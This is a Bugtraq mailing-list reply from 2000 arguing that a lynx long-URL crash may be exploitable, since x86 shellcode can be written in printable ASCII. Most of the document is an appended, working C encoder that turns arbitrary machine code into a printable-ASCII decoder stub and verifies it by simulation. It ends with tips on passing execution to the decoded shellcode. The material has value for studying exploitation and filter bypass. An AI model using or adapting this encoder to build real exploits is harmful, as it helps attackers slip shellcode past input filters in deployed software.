[14225] in bugtraq


Re: lynx - someone is deaf and blind ;)

daemon@ATHENA.MIT.EDU (Steve VanDevender)
Thu Mar 9 03:21:10 2000

Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-Id:  <14534.38991.771639.187716@hexadecimal.uoregon.edu>
Date:         Wed, 8 Mar 2000 10:13:35 -0800
Reply-To: Steve VanDevender <stevev@HEXADECIMAL.UOREGON.EDU>
From: Steve VanDevender <stevev@HEXADECIMAL.UOREGON.EDU>
X-To:         Mariusz Woloszyn <emsi@IT.PL>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To:  <Pine.LNX.4.04.10003071857260.12554-100000@dzyngiel.ipartners.pl>

Mariusz Woloszyn writes:
 > It's true that lynx segfaults on long URLs, but exploiting it is (IMHO)
 > impossible because lynx strips all nonprintable characters thus smuggling
 > RET address is impossible. I have never heard about ASCII-only shellcode
 > also :)

 > I assume lynx bugs are unexploitable...

Don't bet on it.  For the x86, at least, it's not that hard to use only
the opcodes that are printable ASCII characters to write pretty much any
program you'd want; using self-modifying code you can generate the
opcodes that aren't in the printable ASCII set.  I've seen examples,
such as a printable-ASCII-only .COM file for bootstrapping a DOS Kermit
distribution.
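The technique Steve describes, as an added example that is not part of his message or of lynx: a small encoder that rewrites an arbitrary x86 byte string as a stub built only from printable-ASCII opcodes, plus a tiny interpreter that confirms the stub rebuilds the original bytes. The three real 32-bit x86 encodings used are 0x25 ('%', and eax,imm32), 0x2d ('-', sub eax,imm32) and 0x50 ('P', push eax): two ANDs with disjoint printable masks zero eax, three subtractions with printable immediates set it to any 32-bit value, and a push writes that value to the stack. The AND masks, the byte-splitting rule, and the sample payload are my own choices; the payload bytes are constructed to hit the awkward cases (0x00, 0xff, values just around three times the smallest printable byte). Nothing here is executed as machine code; the stub is only simulated.

```c
/*
 * Added example (not from the original message): encode arbitrary x86 bytes
 * as a printable-ASCII decoder stub and simulate it.  Assumes 32-bit x86
 * semantics for the three opcodes used; the stub is never executed here.
 */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define OP_AND_EAX_IMM32 0x25   /* '%'  and eax, imm32 */
#define OP_SUB_EAX_IMM32 0x2d   /* '-'  sub eax, imm32 */
#define OP_PUSH_EAX      0x50   /* 'P'  push eax       */
#define PR_MIN 0x21             /* '!'  first printable byte allowed */
#define PR_MAX 0x7e             /* '~'  last printable byte allowed  */

/* Constructed sample payload: non-printable opcode bytes plus edge cases. */
static const unsigned char SAMPLE[] = {0x31,0xc0,0x00,0xff,0x80,0x7f,0x62,0x63,0x01};
#define SAMPLE_LEN (sizeof SAMPLE)

static int all_printable(const unsigned char *buf, size_t len) {
    for (size_t i = 0; i < len; i++)
        if (buf[i] < PR_MIN || buf[i] > PR_MAX) return 0;
    return 1;
}
static size_t put_u32(unsigned char *out, uint32_t v) {          /* little-endian */
    for (int k = 0; k < 4; k++) out[k] = (v >> (8 * k)) & 0xff;
    return 4;
}
static uint32_t get_u32(const unsigned char *p) {
    uint32_t v = 0;
    for (int k = 0; k < 4; k++) v |= (uint32_t)p[k] << (8 * k);
    return v;
}

/* Find a, b, c with every byte in [PR_MIN, PR_MAX] such that
 * 0 - a - b - c == target (mod 2^32).  Column by column: three printable
 * digits can sum to anything in [3*PR_MIN, 3*PR_MAX] = [99, 378], so a
 * column needing less than 99 overflows 256 into the next column instead. */
static void split_sub3(uint32_t target, uint32_t *a, uint32_t *b, uint32_t *c) {
    uint32_t n = (uint32_t)0 - target;      /* a + b + c must equal n mod 2^32 */
    int carry = 0;
    *a = *b = *c = 0;
    for (int i = 0; i < 4; i++) {
        int s = (int)((n >> (8 * i)) & 0xff) - carry;  /* digit sum this column needs */
        carry = 0;
        if (s < 3 * PR_MIN) { s += 256; carry = 1; }   /* carry into next column */
        int da = s - 2 * PR_MIN; if (da > PR_MAX) da = PR_MAX;
        int db = s - da - PR_MIN; if (db > PR_MAX) db = PR_MAX;
        int dc = s - da - db;                           /* lands in [PR_MIN, PR_MAX] */
        *a |= (uint32_t)da << (8 * i);
        *b |= (uint32_t)db << (8 * i);
        *c |= (uint32_t)dc << (8 * i);
    }
}
static int split_ok(uint32_t target) {                  /* self-check for one value */
    uint32_t a, b, c; unsigned char buf[12];
    split_sub3(target, &a, &b, &c);
    put_u32(buf, a); put_u32(buf + 4, b); put_u32(buf + 8, c);
    return all_printable(buf, 12) && (uint32_t)(0u - a - b - c) == target;
}

/* and eax,"UUUU"; and eax,"****" (disjoint bits, so eax = 0);
 * sub eax,a; sub eax,b; sub eax,c; push eax.  26 bytes, all printable. */
static size_t emit_push_dword(unsigned char *out, uint32_t value) {
    uint32_t a, b, c; size_t n = 0;
    out[n++] = OP_AND_EAX_IMM32; n += put_u32(out + n, 0x55555555u);
    out[n++] = OP_AND_EAX_IMM32; n += put_u32(out + n, 0x2a2a2a2au);
    split_sub3(value, &a, &b, &c);
    out[n++] = OP_SUB_EAX_IMM32; n += put_u32(out + n, a);
    out[n++] = OP_SUB_EAX_IMM32; n += put_u32(out + n, b);
    out[n++] = OP_SUB_EAX_IMM32; n += put_u32(out + n, c);
    out[n++] = OP_PUSH_EAX;
    return n;
}

/* Pad to a dword with 0x90 (nop) and push dwords last-first, so the decoded
 * bytes sit in their original order at esp when the stub finishes. */
static size_t encode_printable(const unsigned char *payload, size_t len, unsigned char *out) {
    size_t words = (len + 3) / 4, n = 0;
    for (size_t w = words; w-- > 0; ) {
        uint32_t v = 0;
        for (int k = 0; k < 4; k++) {
            size_t idx = w * 4 + k;
            v |= (uint32_t)(idx < len ? payload[idx] : 0x90) << (8 * k);
        }
        n += emit_push_dword(out + n, v);
    }
    return n;
}

/* Interpreter for just the three opcodes (32-bit semantics).  Copies the
 * simulated stack, lowest address first, to stack_out; returns 0 on error. */
#define STACK_BYTES 256
static size_t simulate(const unsigned char *code, size_t len, unsigned char *stack_out) {
    unsigned char stack[STACK_BYTES];
    size_t esp = STACK_BYTES, ip = 0;
    uint32_t eax = 0xdeadbeefu;                /* assume garbage in eax on entry */
    while (ip < len) {
        unsigned char op = code[ip++];
        if (op == OP_PUSH_EAX) {
            if (esp < 4) return 0;
            esp -= 4; put_u32(stack + esp, eax);
        } else if (op == OP_AND_EAX_IMM32 || op == OP_SUB_EAX_IMM32) {
            if (ip + 4 > len) return 0;
            uint32_t imm = get_u32(code + ip); ip += 4;
            eax = (op == OP_AND_EAX_IMM32) ? (eax & imm) : (eax - imm);
        } else return 0;                       /* not a printable-stub opcode */
    }
    memcpy(stack_out, stack + esp, STACK_BYTES - esp);
    return STACK_BYTES - esp;
}

/* Encode SAMPLE, check the stub is printable, simulate it, compare. */
static int roundtrip_ok(void) {
    unsigned char stub[512], decoded[STACK_BYTES];
    size_t n = encode_printable(SAMPLE, SAMPLE_LEN, stub);
    size_t m = simulate(stub, n, decoded);
    return all_printable(stub, n) && m == ((SAMPLE_LEN + 3) / 4) * 4 &&
           memcmp(decoded, SAMPLE, SAMPLE_LEN) == 0;
}

int main(void) {
    unsigned char stub[512];
    size_t n = encode_printable(SAMPLE, SAMPLE_LEN, stub);
    printf("stub (%zu bytes): %.*s\n", n, (int)n, stub);
    return roundtrip_ok() ? 0 : 1;
}
```

Two caveats a practitioner would want: the stub only stages the bytes, so real printable shellcode still has to get control to them (the usual trick is to place the pushes so that esp ends up just past the stub's last byte and execution falls through into the decoded code); and this is 32-bit reasoning, since in 64-bit mode the bytes 0x40-0x4f ('@' through 'O') are REX prefixes rather than inc/dec, so the printable instruction set is different.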
